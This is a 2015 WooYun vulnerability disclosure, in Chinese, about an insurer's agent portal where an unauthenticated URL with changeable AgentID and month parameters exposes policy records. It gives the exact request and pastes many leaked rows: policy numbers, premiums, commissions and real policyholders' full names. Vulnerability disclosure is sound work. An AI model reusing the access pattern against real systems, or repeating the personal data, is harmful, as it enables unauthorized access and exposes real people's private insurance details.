当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134216

漏洞标题:长生人寿某处未授权访问导致用户保单信息泄漏(保单号,投保人,保单主险)

相关厂商:长生人寿

漏洞作者: 0x 80

提交时间:2015-08-17 12:45

修复时间:2015-10-03 09:50

公开时间:2015-10-03 09:50

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

长生人寿某处未授权访问导致用户保单信息泄漏(保单号,投保人, 保单主险)

详细说明:

http://www.agent.nissay-greatwall.cn/NISSAY/%28S%285ticp155wr3xoj55is3txdz5%29%29/AgentSalarySearch/ASS0102.aspx?AgentID=ZJ0003788&PerfYM=201504
直接绕过
YM代表时间
可以查询到2015年全年的保单信息

434.png


0200031347	ZJ0003788	ZJ0003788	HR2101	CF7015	295.00	15.00	44.25	3	王剑飞	20150401
0200031347	ZJ0003788	ZJ0003788	CF7015	CF7015	1597.00	6.00	95.82	3	王剑飞	20150401
0200031347	ZJ0003788	ZJ0003788	CG7015	CF7015	315.00	6.00	18.90	3	王剑飞	20150401
0200031347	ZJ0003788	ZJ0003788	AM5101	CF7015	80.00	20.00	16.00	3	王剑飞	20150401
0200025095	ZJ0003788	ZJ0003788	EG8010	EG8010	2701.00	4.00	108.04	4	郑荣富	20150429
0200032038	ZJ0003788	ZJ0003788	EJ6020	CF6020	2478.00	8.00	198.24	3	陈燕方	20150428
0200025095	ZJ0003788	ZJ0003788	A20101	EG8010	405.00	20.00	81.00	4	郑荣富	20150429
0200032038	ZJ0003788	ZJ0003788	CG6020	CF6020	138.00	8.00	11.04	3	陈燕方	20150428
0200025095	ZJ0003788	ZJ0003788	HR2101	EG8010	479.00	15.00	71.85	4	郑荣富	20150429
0200032038	ZJ0003788	ZJ0003788	CF6020	CF6020	690.00	8.00	55.20	3	陈燕方	20150428
0200025095	ZJ0003788	ZJ0003788	CD8010	EG8010	1503.00	4.00	60.12	4	郑荣富	20150429
0200031347	ZJ0003788	ZJ0003788	EJ7015	CF7015	2984.00	6.00	179.04	3	王剑飞	20150401
0200031981	ZJ0003788	ZJ0003788	EI0015	EI0015	12000.00	6.00	720.00	3	陈燕方	20150430
孤儿保单相关
保单号	当前代理人	初始代理人	险种	保单主险	保费	佣金率(%)	佣金	缴费期间	投保人	佣金生成日
0200031804	ZJ0004708	ZJ0003788	AM5101	CC0015	50.00	20.00	10.00	3	卢燕飞	20150423
0200031792	ZJ0004445	ZJ0003788	EI0015	EI0015	8000.00	6.00	240.00	3	陈骊	20150409
0200031804	ZJ0004708	ZJ0003788	CC0015	CC0015	1978.00	7.00	69.23	3	卢燕飞	20150423
0200037891	ZJ0005880	ZJ0003788	CF8010	CF8010	1383.00	4.00	55.32	2	刘仙英	20150402
0200025362	ZJ0004429	ZJ0003788	EH6020	EH6020	1183.00	6.00	35.49	4	江志平	20150430
0200037891	ZJ0005880	ZJ0003788	CG8010	CF8010	301.00	4.00	12.04	2	刘仙英	20150402
0200025362	ZJ0004429	ZJ0003788	CE6020	EH6020	1139.00	6.00	34.17	4	江志平	20150430
0200018522	ZJ0003591	ZJ0003788	EC0010	EC0010	5671.00	4.00	113.42	5	袁志仙	20150401
0200037891	ZJ0005880	ZJ0003788	EJ8010	CF8010	2378.00	4.00	95.12	2	刘仙英	20150402
0200025362	ZJ0004429	ZJ0003788	A20101	EH6020	180.00	20.00	36.00	4	江志平	20150430
0200018522	ZJ0003591	ZJ0003788	TP1010	EC0010	53.00	20.00	10.60	5	袁志仙	20150401
继续率相关
保单号	应收保费	实际保费	保单状态
0200037599	4828.00	4828.00	有效
0200037462	5381.00	5381.00	有效
0200036025	3524.00	3524.00	有效
0200035163	8000.00	8000.00	有效
0200034621	3050.00	3050.00	有效
0200032698	6000.00	6000.00	有效
0200032311	11097.00	11097.00	有效
0200032038	3306.00	3306.00	有效
0200031981	12000.00	12000.00	有效
0200031347	4896.00	4896.00	有效
0200031022	10342.00	10342.00	有效


http://www.agent.nissay-greatwall.cn/NISSAY/%28S%285ticp155wr3xoj55is3txdz5%29%29/AgentSalarySearch/ASS0102.aspx?AgentID=ZJ0003788&PerfYM=201501
一月的

6745.png


续年度佣金相关保单
保单号	当前代理人	初始代理人	险种	保单主险	保费	佣金率(%)	佣金	缴费期间	投保人	佣金生成日
0200037462	ZJ0003788	ZJ0003788	EH6015	EH6015	2758.00	7.00	193.06	2	郑明铭	20150113
0200037599	ZJ0003788	ZJ0003788	EH6015	EH6015	2384.00	7.00	166.88	2	郑明铭	20150113
0200037599	ZJ0003788	ZJ0003788	CE6015	EH6015	2367.00	7.00	165.69	2	郑明铭	20150113
0200037599	ZJ0003788	ZJ0003788	AM5101	EH6015	77.00	20.00	15.40	2	郑明铭	20150113
0200037462	ZJ0003788	ZJ0003788	AM5101	EH6015	101.00	20.00	20.20	2	郑明铭	20150113
0200023530	ZJ0003788	ZJ0003788	EC0015	EC0015	3889.00	5.00	194.45	4	朱春仙	20150109
0200037462	ZJ0003788	ZJ0003788	CE6015	EH6015	2522.00	7.00	176.54	2	郑明铭	20150113
孤儿保单相关
保单号	当前代理人	初始代理人	险种	保单主险	保费	佣金率(%)	佣金	缴费期间	投保人	佣金生成日
0200037496	ZJ0005884	ZJ0003788	CF8020	CF8020	774.00	10.00	77.40	2	吕美琴	20150114
0200035714	ZJ0005333	ZJ0003788	CG7020	CF7020	225.00	10.00	22.50	2	吴丽华	20150106
0200035700	ZJ0005673	ZJ0003788	HR2101	CF7020	255.00	15.00	38.25	2	吴文娟	20150106
0200036325	ZJ0005777	ZJ0003788	AM3101	A40101	223.00	20.00	44.60	2	周国英	20150114
0200035700	ZJ0005673	ZJ0003788	CG7020	CF7020	234.00	10.00	23.40	2	吴文娟	20150106
0200036325	ZJ0005777	ZJ0003788	HR1101	A40101	205.00	15.00	30.75	2	周国英	20150114
0200035714	ZJ0005333	ZJ0003788	CF7020	CF7020	1093.00	10.00	109.30	2	吴丽华	20150106
0200035700	ZJ0005673	ZJ0003788	EJ7020	CF7020	1898.00	10.00	189.80	2	吴文娟	20150106
0200036325	ZJ0005777	ZJ0003788	A40101	A40101	120.00	20.00	24.00	2	周国英	20150114
0200035700	ZJ0005673	ZJ0003788	CF7020	CF7020	1129.00	10.00	112.90	2	吴文娟	20150106
0200029143	ZJ0004708	ZJ0003788	EJ8005	CF8005	4413.00	3.00	66.20	3	汪宝香	20150126
0200035703	ZJ0005679	ZJ0003788	AM5101	CF7020	83.00	20.00	16.60	2	王幼苹	20150109
0200037496	ZJ0005884	ZJ0003788	EJ8020	CF8020	994.00	10.00	99.40	2	吕美琴	20150114
0200035714	ZJ0005333	ZJ0003788	HR2101	CF7020	245.00	15.00	36.75	2	吴丽华	20150106
0200028963	ZJ0004448	ZJ0003788	CG6010	CF6010	438.00	4.00	8.76	3	陈兵	20150108
0200035703	ZJ0005679	ZJ0003788	CF7020	CF7020	1049.00	10.00	104.90	2	王幼苹	20150109
0200037496	ZJ0005884	ZJ0003788	CG8020	CF8020	165.00	10.00	16.50	2	吕美琴	20150114
0200035714	ZJ0005333	ZJ0003788	EJ7020	CF7020	2111.00	10.00	211.10	2	吴丽华	20150106
0200035700	ZJ0005673	ZJ0003788	A20101	CF7020	81.00	20.00	16.20	2	吴文娟	20150106
0200028963	ZJ0004448	ZJ0003788	CF6010	CF6010	2494.00	4.00	49.88	3	陈兵	20150108
1	2


漏洞证明:

6745.png


修复方案:

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-19 09:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无